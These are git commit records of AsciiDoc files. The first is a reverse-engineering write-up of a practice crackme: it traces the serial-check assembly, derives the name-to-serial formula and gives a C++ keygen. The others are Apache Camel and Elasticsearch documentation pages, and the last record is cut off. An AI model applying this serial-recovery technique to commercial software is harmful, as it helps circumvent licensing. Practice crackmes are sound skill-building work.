{"commit":"4a0e3ed09ca3cf9d90ab715d35f970dcf75454f0","subject":"Update 2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","message":"Update 2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","repos":"reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io,reversergeek\/reversergeek.github.io","old_file":"_posts\/2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","new_file":"_posts\/2015-08-12-Reverse-Engineering-Crackme_v2-Write-Up.adoc","new_contents":"= Reverse Engineering Crackme_v2 Write Up.\n\nCrackmes are free, reverse engineering challenges made by reversers for others to practice their skills. They're also a great way to demonstrate skill for a portfolio.\n\n=== First Impressions:\n\nA quick run of the program shows us that it's a command line program. The crackme outputs some strings and takes 2 inputs: serial, and name. \n\nimage::http:\/\/imgur.com\/GrpOB7j.png[]\n\nThe readme.txt file tells us that the crackme is written in C++ and our goal is to write a keygen, not patch the software.\n\nA quick PEiD scan detects no packer\/crypter signatures.\n\nimage::http:\/\/imgur.com\/z9tJiMs.png[]\n\n\nOpening it in IDA, we see the same strings that we saw on the command line being passed to std::cout, and the name and serial coming from std::cin being stored in `var_108` and `var_208` respectively. 
I'll rename those variables `szName` and `szSerial`.\n\nimage::http:\/\/imgur.com\/UdRo9CK.png[]\n\n=== Reverse Engineering Serial Checking Algorithm:\n\nimage::http:\/\/imgur.com\/usthcIT.png[]\n\nYou can see in the image above (still in the main function, just scrolled down a little) that this crackme has only one conditional branch, which leads to either `\"Error : : Not a correct Serial\\n\"` or `\"Correct : : Good Work\\n\"`.\n\n\nThe code leading up to the `cmp` and `jmp` that make up that conditional branch will be the algorithm that checks whether the serial and name are correct. Let's have a look at it, shall we:\n\n\nFirst the length of `szName` is determined with `strlen()`:\n\n....\nlea eax, [ebp+szName]\nmov [esp], eax ; char *\ncall _strlen\n....\n\nNext the length is multiplied by `0x875CD` (554445d) and again by `0x51eb851f` (1374389535d), but this time the result goes into the `edx:eax` register pair. `edx` (the high half) is then moved into `eax`, discarding the least significant half of the quad word and effectively dividing by 2**32:\n\n....\nmov edx, eax\nimul edx, 875CDh\nmov eax, 51EB851Fh\nmul edx\nmov eax, edx\n....\n\nShift right is used to divide by 2**5, i.e. 32:\n\n....\nshr eax, 5\n....\n\nThen multiplication by `0x0FFFFFC90`, which is -880d:\n\n....\nimul eax, 0FFFFFC90h\n....\n\nNext `_sprintf` is used to convert the (now floating point) value into a string with \"-x019871\" appended to it. E.g. -50.0 becomes \"-50-x019871\". This is what the serial needs to be. If you were stepping through with a debugger, you would see the desired serial in `var_308`.\n\n....\nmov edx, 0\npush edx\npush eax\nfild qword ptr [esp]\nlea esp, [esp+8]\nfstp [ebp+var_410]\nfld [ebp+var_410]\nfstp qword ptr [esp+8]\nmov dword ptr [esp+4], offset aIX019871 ; \"%i-x019871\"\nlea eax, [ebp+var_308]\nmov [esp], eax ; char *\ncall _sprintf\n....\n\n....\nlea eax, [ebp+var_308]\nmov [esp+4], eax ; char *\nlea eax, [ebp+szSerial]\nmov [esp], eax ; char *\ncall _strcmp\nmov [ebp+var_414], eax\ncmp [ebp+var_414], 0\njz short loc_401719\n....\n\nPutting that all together we get the following equation:\n\n....\nint2str(((((strlen(name) * 554445) * 1374389535 ) \/(2**32)) \/32 ) * -880) + \"-x019871\"\n....\n\nA bit of maths....\n\n....\n1374389535\/(2**32)\/32\n=1\/100\n....\n\ncan simplify the equation into: \n\n....\n((strlen(name) * 554445 \/ 100) * -880)\n....
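\n\nThat multiply-and-shift sequence is just the compiler's way of dividing by 100 without a `div` instruction. A quick way to double-check this (not something the keygen needs, just a sanity test I added while writing this up) is to compare the instruction sequence against a plain division by 100 for every name length that fits the maths:\n\n....\n\/\/ Sanity check: mul 0x51EB851F, keep edx, then shr 5 == divide by 100\n#include <stdio.h>\n#include <stdint.h>\n\nint main() {\n    for (uint32_t len = 1; len <= 7000; ++len) { \/\/ keeps len * 0x875CD inside 32 bits\n        uint32_t x  = len * 0x875CD;                                \/\/ imul edx, 875CDh\n        uint32_t hi = (uint32_t)(((uint64_t)x * 0x51EB851F) >> 32); \/\/ mul, then mov eax, edx\n        uint32_t q  = hi >> 5;                                      \/\/ shr eax, 5\n        if (q != x \/ 100) {\n            printf(\"mismatch at len=%u\\n\", len);\n            return 1;\n        }\n    }\n    printf(\"sequence == x \/ 100 for every length tested\\n\");\n    return 0;\n}\n....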
\n\nAnd there's our keygen algorithm. We could just read the output of sprintf in a debugger, or type up a keygen in our language of choosing.\n\n....\n#include <iostream>\n#include <iomanip>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n\nusing namespace std;\n\nint main(int argc, char *argv[]) {\n char name[100];\n double serial_number;\n\t\n cout << \"name: \";\n cin >> setw(sizeof name) >> name;\n\t\n serial_number = (long double)(-880 * (554445 * strlen(name) \/ 0x64));\n\t\n \/\/ %i with a double looks like a bug, but it reproduces the crackme's own sprintf call\n printf(\"%i-x019871\\n\", serial_number);\n\t\n system(\"pause\");\n return 0;\n}\n....","old_contents":"= Reverse Engineering Crackme_v2 Write Up.\n\n=== First Impressions:\n\nA quick run of the program shows us that it's a command line program. The crackme outputs some strings and takes 2 inputs: serial, and name. \n\nimage::http:\/\/imgur.com\/GrpOB7j.png[]\n\nThe readme.txt file tells us that the crackme is written in C++ and our goal is to write a keygen, not patch the software.\n\nA quick PEiD scan detects no packer\/crypter signatures.\n\nimage::http:\/\/imgur.com\/z9tJiMs.png[]\n\n\nOpening it in IDA, we see the same strings that we saw on the command line being passed to std::cout, and the name and serial coming from std::cin being stored in `var_108` and `var_208` respectively. I'll rename those variables `szName` and `szSerial`.\n\nimage::http:\/\/imgur.com\/UdRo9CK.png[]\n\n=== Reverse Engineering Serial Checking Algorithm:\n\nimage::http:\/\/imgur.com\/usthcIT.png[]\n\nYou can see in the image above (still in the main function, just scrolled down a little) that this crackme has only one conditional branch, which leads to either `\"Error : : Not a correct Serial\\n\"` or `\"Correct : : Good Work\\n\"`.\n\n\nThe code leading up to the `cmp` and `jmp` that make up that conditional branch will be the algorithm that checks whether the serial and name are correct. Let's have a look at it, shall we:\n\n\nFirst the length of `szName` is determined with `strlen()`:\n\n....\nlea eax, [ebp+szName]\nmov [esp], eax ; char *\ncall _strlen\n....\n\nNext the length is multiplied by `0x875CD` (554445d) and again by `0x51eb851f` (1374389535d), but this time the result goes into the `edx:eax` register pair. `edx` (the high half) is then moved into `eax`, discarding the least significant half of the quad word and effectively dividing by 2**32:\n\n....\nmov edx, eax\nimul edx, 875CDh\nmov eax, 51EB851Fh\nmul edx\nmov eax, edx\n....\n\nShift right is used to divide by 2**5, i.e. 32:\n\n....\nshr eax, 5\n....\n\nThen multiplication by `0x0FFFFFC90`, which is -880d:\n\n....\nimul eax, 0FFFFFC90h\n....\n\nNext `_sprintf` is used to convert the (now floating point) value into a string with \"-x019871\" appended to it. E.g. -50.0 becomes \"-50-x019871\". This is what the serial needs to be. If you were stepping through with a debugger, you would see the desired serial in `var_308`.\n\n....\nmov edx, 0\npush edx\npush eax\nfild qword ptr [esp]\nlea esp, [esp+8]\nfstp [ebp+var_410]\nfld [ebp+var_410]\nfstp qword ptr [esp+8]\nmov dword ptr [esp+4], offset aIX019871 ; \"%i-x019871\"\nlea eax, [ebp+var_308]\nmov [esp], eax ; char *\ncall _sprintf\n....\n\n....\nlea eax, [ebp+var_308]\nmov [esp+4], eax ; char *\nlea eax, [ebp+szSerial]\nmov [esp], eax ; char *\ncall _strcmp\nmov [ebp+var_414], eax\ncmp [ebp+var_414], 0\njz short loc_401719\n....\n\nPutting that all together we get the following equation:\n\n....\nint2str(((((strlen(name) * 554445) * 1374389535 ) \/(2**32)) \/32 ) * -880) + \"-x019871\"\n....\n\nA bit of maths....\n\n....\n1374389535\/(2**32)\/32\n=1\/100\n....\n\ncan simplify the equation into: \n\n....\n((strlen(name) * 554445 \/ 100) * -880)\n....\n\nAnd there's our keygen algorithm. 
We could just get the output of sprintf or type up a keygen in our language of choosing.\n\n....\n#include <iostream>\n#include <iomanip>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n\nusing namespace std;\n\nint main(int argc, char *argv[]) {\n char name[100];\n double serial_number;\n\t\n cout << \"name: \";\n cin >> setw(sizeof name) >> name;\n\t\n serial_number = (long double)(-880 * (554445 * strlen(name) \/ 0x64));\n\t\n printf(\"%i-x019871\\n\", serial_number);\n \/\/cout << \"Hellow world\" << endl;\n\t\n system(\"pause\");\n return 0;\n}\n....","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8aa0bad0614fc08345dd5b373272876f47b1bd0a","subject":"Regen docs","message":"Regen docs\n","repos":"pax95\/camel,CodeSmell\/camel,adessaigne\/camel,cunningt\/camel,ullgren\/camel,ullgren\/camel,nikhilvibhav\/camel,tdiesler\/camel,christophd\/camel,alvinkwekel\/camel,tdiesler\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,nicolaferraro\/camel,gnodet\/camel,apache\/camel,gnodet\/camel,CodeSmell\/camel,ullgren\/camel,DariusX\/camel,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,nicolaferraro\/camel,alvinkwekel\/camel,objectiser\/camel,pax95\/camel,nicolaferraro\/camel,adessaigne\/camel,nicolaferraro\/camel,tdiesler\/camel,DariusX\/camel,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel,pmoerenhout\/camel,pax95\/camel,DariusX\/camel,apache\/camel,tdiesler\/camel,pmoerenhout\/camel,pmoerenhout\/camel,zregvart\/camel,gnodet\/camel,tadayosi\/camel,tadayosi\/camel,CodeSmell\/camel,cunningt\/camel,objectiser\/camel,apache\/camel,apache\/camel,tdiesler\/camel,cunningt\/camel,nikhilvibhav\/camel,mcollovati\/camel,DariusX\/camel,adessaigne\/camel,christophd\/camel,pmoerenhout\/camel,pax95\/camel,zregvart\/camel,zregvart\/camel,adessaigne\/camel,pmoerenhout\/camel,adessaigne\/camel,mcollovati\/camel,objectiser\/camel,ullgren\/camel,pax95\/camel,apache\/camel,objectiser\/camel,tdiesler\/camel,alvinkwekel\/camel,tadayosi\/camel,gnodet\/camel,zregvart\/camel,mcollovati\/camel,cunningt\/camel,mcollovati\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/openshift-builds-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/openshift-builds-component.adoc","new_contents":"[[openshift-builds-component]]\n= Openshift Builds Component\n:page-source: components\/camel-kubernetes\/src\/main\/docs\/openshift-builds-component.adoc\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Builds component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes build operations.\n\n\n== Component Options\n\n\/\/ component options: START\nThe Openshift Builds component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Openshift Builds endpoint is configured using URI syntax:\n\n----\nopenshift-builds:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| 
Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (22 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (producer) | The Kubernetes API Version to use | | String\n| *dnsDomain* (producer) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (producer) | Default KubernetesClient to use if provided | | KubernetesClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *portName* (producer) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (producer) | The port protocol, used for ServiceCall EIP | tcp | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
| false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n== Supported producer operation\n\n- listBuilds\n- listBuildsByLabels\n- getBuild\n\n== Openshift Builds Producer Examples\n\n- listBuilds: this operation lists the Builds on an Openshift cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:list\").\n    toF(\"openshift-builds:\/\/\/?kubernetesClient=#kubernetesClient&operation=listBuilds\").\n    to(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation returns a List of Builds from your Openshift cluster\n\n- listBuildsByLabels: this operation lists the builds by labels on an Openshift cluster\n\n[source,java]\n--------------------------------------------------------------------------------\nfrom(\"direct:listByLabels\").process(new Processor() {\n\n    @Override\n    public void process(Exchange exchange) throws Exception {\n        Map<String, String> labels = new HashMap<>();\n        labels.put(\"key1\", \"value1\");\n        labels.put(\"key2\", \"value2\");\n        exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_BUILDS_LABELS, labels);\n    }\n}).\ntoF(\"openshift-builds:\/\/\/?kubernetesClient=#kubernetesClient&operation=listBuildsByLabels\").\nto(\"mock:result\");\n--------------------------------------------------------------------------------\n\nThis operation returns a List of Builds from your cluster, using a label selector (with keys key1 and key2, and values value1 and value2)\n
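\n- getBuild: there is no example for this operation on this page yet; the sketch below follows the same pattern as the operations above. The `KUBERNETES_BUILD_NAME` header constant is an assumption by analogy with the labels constant, so verify the exact name in `KubernetesConstants` before relying on it.\n\n[source,java]\n--------------------------------------------------------------------------------\n\/\/ Hypothetical sketch: fetch a single Build by name.\n\/\/ KUBERNETES_BUILD_NAME is assumed; check KubernetesConstants for the exact constant.\nfrom(\"direct:getBuild\").process(new Processor() {\n\n    @Override\n    public void process(Exchange exchange) throws Exception {\n        exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_NAMESPACE_NAME, \"default\");\n        exchange.getIn().setHeader(KubernetesConstants.KUBERNETES_BUILD_NAME, \"my-build\");\n    }\n}).\ntoF(\"openshift-builds:\/\/\/?kubernetesClient=#kubernetesClient&operation=getBuild\").\nto(\"mock:result\");\n--------------------------------------------------------------------------------\n\nIf the assumption holds, this returns the single Build matching the given name from your cluster.\n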
","old_contents":"[[openshift-builds-component]]\n= Openshift Builds Component\n:page-source: components\/camel-kubernetes\/src\/main\/docs\/openshift-builds-component.adoc\n\n*Available as of Camel version 2.17*\n\nThe Kubernetes Builds component is one of xref:kubernetes.adoc[Kubernetes Components] which\nprovides a producer to execute kubernetes build operations.\n\n\n== Component Options\n\n\/\/ component options: START\nThe Openshift Builds component supports 1 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n|===\n\/\/ component options: END\n\n\n== Endpoint Options\n\n\/\/ endpoint options: START\nThe Openshift Builds endpoint is configured using URI syntax:\n\n----\nopenshift-builds:masterUrl\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *masterUrl* | *Required* Kubernetes Master url | | String\n|===\n\n\n=== Query Parameters (22 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiVersion* (producer) | The Kubernetes API Version to use | | String\n| *dnsDomain* (producer) | The dns domain, used for ServiceCall EIP | | String\n| *kubernetesClient* (producer) | Default KubernetesClient to use if provided | | KubernetesClient\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | Producer operation to do on Kubernetes | | String\n| *portName* (producer) | The port name, used for ServiceCall EIP | | String\n| *portProtocol* (producer) | The port protocol, used for ServiceCall EIP | tcp | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *connectionTimeout* (advanced) | Connection timeout in milliseconds to use when making requests to the Kubernetes API server. | | Integer\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). 
| false | boolean\n| *caCertData* (security) | The CA Cert Data | | String\n| *caCertFile* (security) | The CA Cert File | | String\n| *clientCertData* (security) | The Client Cert Data | | String\n| *clientCertFile* (security) | The Client Cert File | | String\n| *clientKeyAlgo* (security) | The Key Algorithm used by the client | | String\n| *clientKeyData* (security) | The Client Key data | | String\n| *clientKeyFile* (security) | The Client Key file | | String\n| *clientKeyPassphrase* (security) | The Client Key Passphrase | | String\n| *oauthToken* (security) | The Auth Token | | String\n| *password* (security) | Password to connect to Kubernetes | | String\n| *trustCerts* (security) | Define if the certs we used are trusted anyway or not | | Boolean\n| *username* (security) | Username to connect to Kubernetes | | String\n|===\n\/\/ endpoint options: END\n\n\/\/ spring-boot-auto-configure options: START\n\/\/ spring-boot-auto-configure options: END\n\n== Supported producer operation\n\n- listBuilds\n- listBuildsByLabels\n- getBuild\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21ffff379b920821e73485b375c663b931f4227","subject":"Docs: Hunspell tidied","message":"Docs: Hunspell tidied\n\nTidied some formatting","repos":"aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/hunspell-tokenfilter.asciidoc","new_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(defaults to `<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold both the `*.aff` and `*.dic`\nfiles (all of which will automatically be picked up). 
For example,\nassuming the default hunspell location is used, the following directory\nlayout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nThe location of the hunspell directory can be configured using the\n`indices.analysis.hunspell.dictionary.location` setting in\n_elasticsearch.yml_.\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`:: \n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add a `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it in the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`:: \n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`:: \n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`:: \n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`:: \n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","old_contents":"[[analysis-hunspell-tokenfilter]]\n=== Hunspell Token Filter\n\nBasic support for hunspell stemming. Hunspell dictionaries will be\npicked up from a dedicated hunspell directory on the filesystem\n(defaults to `<path.conf>\/hunspell`). Each dictionary is expected to\nhave its own directory named after its associated locale (language).\nThis dictionary directory is expected to hold both the \\*.aff and \\*.dic\nfiles (all of which will automatically be picked up). 
For example,\nassuming the default hunspell location is used, the following directory\nlayout will define the `en_US` dictionary:\n\n[source,js]\n--------------------------------------------------\n- conf\n |-- hunspell\n | |-- en_US\n | | |-- en_US.dic\n | | |-- en_US.aff\n--------------------------------------------------\n\nThe location of the hunspell directory can be configured using the\n`indices.analysis.hunspell.dictionary.location` settings in\n_elasticsearch.yml_.\n\nEach dictionary can be configured with one setting:\n\n`ignore_case`:: \n If true, dictionary matching will be case insensitive\n (defaults to `false`)\n\nThis setting can be configured globally in `elasticsearch.yml` using\n\n* `indices.analysis.hunspell.dictionary.ignore_case`\n\nor for specific dictionaries:\n\n* `indices.analysis.hunspell.dictionary.en_US.ignore_case`.\n\nIt is also possible to add a `settings.yml` file under the dictionary\ndirectory which holds these settings (this will override any other\nsettings defined in the `elasticsearch.yml`).\n\nOne can use the hunspell stem filter by configuring it in the analysis\nsettings:\n\n[source,js]\n--------------------------------------------------\n{\n \"analysis\" : {\n \"analyzer\" : {\n \"en\" : {\n \"tokenizer\" : \"standard\",\n \"filter\" : [ \"lowercase\", \"en_US\" ]\n }\n },\n \"filter\" : {\n \"en_US\" : {\n \"type\" : \"hunspell\",\n \"locale\" : \"en_US\",\n \"dedup\" : true\n }\n }\n }\n}\n--------------------------------------------------\n\nThe hunspell token filter accepts four options:\n\n`locale`:: \n A locale for this filter. If this is unset, the `lang` or\n `language` are used instead - so one of these has to be set.\n\n`dictionary`:: \n The name of a dictionary. The path to your hunspell\n dictionaries should be configured via\n `indices.analysis.hunspell.dictionary.location` before.\n\n`dedup`:: \n If only unique terms should be returned, this needs to be\n set to `true`. Defaults to `true`.\n\n`longest_only`:: \n If only the longest term should be returned, set this to `true`.\n Defaults to `false`: all possible stems are returned.\n\nNOTE: As opposed to the snowball stemmers (which are algorithm based)\nthis is a dictionary lookup based stemmer and therefore the quality of\nthe stemming is determined by the quality of the dictionary.\n\n[float]\n==== References\n\nHunspell is a spell checker and morphological analyzer designed for\nlanguages with rich morphology and complex word compounding and\ncharacter encoding.\n\n1. Wikipedia, http:\/\/en.wikipedia.org\/wiki\/Hunspell\n\n2. Source code, http:\/\/hunspell.sourceforge.net\/\n\n3. Open Office Hunspell dictionaries, http:\/\/wiki.openoffice.org\/wiki\/Dictionaries\n\n4. Mozilla Hunspell dictionaries, https:\/\/addons.mozilla.org\/en-US\/firefox\/language-tools\/\n\n5. Chromium Hunspell dictionaries,\n http:\/\/src.chromium.org\/viewvc\/chrome\/trunk\/deps\/third_party\/hunspell_dictionaries\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3536935b2995366abe18a39b444500897d0513e","subject":"[DOCS] Adds inference phase to get DFA job stats. 
(#60737)\n\n","repos":"scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/ml\/df-analytics\/apis\/get-dfanalytics-stats.asciidoc","new_file":"docs\/reference\/ml\/df-analytics\/apis\/get-dfanalytics-stats.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"platinum\"]\n[[get-dfanalytics-stats]]\n= Get {dfanalytics-jobs} statistics API\n[subs=\"attributes\"]\n++++\n<titleabbrev>Get {dfanalytics-jobs} stats<\/titleabbrev>\n++++\n\nRetrieves usage information for {dfanalytics-jobs}.\n\nexperimental[]\n\n[[ml-get-dfanalytics-stats-request]]\n== {api-request-title}\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/<data_frame_analytics_id>,<data_frame_analytics_id>\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/_all\/_stats` +\n\n`GET _ml\/data_frame\/analytics\/*\/_stats`\n\n\n[[ml-get-dfanalytics-stats-prereq]]\n== {api-prereq-title}\n\nIf the {es} {security-features} are enabled, you must have the following \nprivileges:\n\n* cluster: `monitor_ml`\n \nFor more information, see <<security-privileges>> and {ml-docs-setup-privileges}.\n\n[[ml-get-dfanalytics-stats-path-params]]\n== {api-path-parms-title}\n\n`<data_frame_analytics_id>`::\n(Optional, string)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=job-id-data-frame-analytics-default]\n\n\n[[ml-get-dfanalytics-stats-query-params]]\n== {api-query-parms-title}\n\n`allow_no_match`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=allow-no-match]\n\n`from`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=from]\n\n`size`::\n(Optional, integer) \ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=size]\n\n`verbose`::\n(Optional, boolean)\ninclude::{es-repo-dir}\/ml\/ml-shared.asciidoc[tag=verbose]\n\n[role=\"child_attributes\"]\n[[ml-get-dfanalytics-stats-response-body]]\n== {api-response-body-title}\n\n`data_frame_analytics`::\n(array)\nAn array of objects that contain usage information for {dfanalytics-jobs}, which\nare sorted by the `id` value in ascending order.\n+\n.Properties of {dfanalytics-job} usage resources\n[%collapsible%open]\n====\n\/\/Begin analysis_stats\n`analysis_stats`:::\n(object)\nAn object containing information about the analysis job.\n+\n.Properties of `analysis_stats`\n[%collapsible%open]\n=====\n\/\/Begin classification_stats\n`classification_stats`::::\n(object)\nAn object containing information about the {classanalysis} job.\n+\n.Properties of `classification_stats`\n[%collapsible%open]\n======\n\/\/Begin class_hyperparameters\n`hyperparameters`::::\n(object)\nAn object containing the parameters of the {classanalysis} job.\n+\n.Properties of 
